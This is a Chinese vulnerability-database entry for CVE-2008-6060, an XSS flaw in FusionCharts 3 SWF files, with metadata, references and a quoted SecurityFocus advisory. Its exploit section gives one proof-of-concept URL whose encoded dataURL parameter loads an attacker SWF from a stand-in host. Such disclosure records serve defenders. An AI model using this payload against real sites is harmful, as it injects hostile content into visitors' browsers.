InfoSoft FusionCharts SWF Flash File 远程代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114230 漏洞类型 跨站脚本
发布时间 2008-01-02 更新时间 2009-02-19
CVE编号 CVE-2008-6060 CNNVD-ID CNNVD-200902-090
漏洞平台 Multiple CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/30973
https://www.securityfocus.com/bid/27109
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-090
|漏洞详情
InfoSoftFusionCharts是一款基于adobeflash的一个网页开发工具。InfoSoftFusionCharts创建的任意的ShockwaveFlash(SWF)文件中的ActionScript存在跨站脚本攻击漏洞。远程攻击者可以借助dataURL参数中的IMG元素的SRC属性里的一个URL,注入任意的额外的SWF内容。
|漏洞EXP
source: http://www.securityfocus.com/bid/27109/info

InfoSoft FusionCharts is prone to a remote code-execution vulnerability because the application fails to properly sanitize user-supplied input.

An attacker can exploit this issue to execute malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible. 

http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//www.example2.com/DoKnowEvil.swf%3F.jpg%22%3E
|受影响的产品
InfoSoft FusionCharts 3
|参考资料

来源:US-CERT
名称:VU#249337
链接:http://www.kb.cert.org/vuls/id/249337
来源:BID
名称:27109
链接:http://www.securityfocus.com/bid/27109
来源:BUGTRAQ
名称:20080102XSSVulnerabilitiesinCommonShockwaveFlashFiles
链接:http://www.securityfocus.com/archive/1/archive/1/485722/100/100/threaded
来源:VUPEN
名称:ADV-2008-0067
链接:http://www.frsirt.com/english/advisories/2008/0067
来源:MISC
链接:http://docs.google.com/View?docid=ajfxntc4dmsq_14dt57ssdw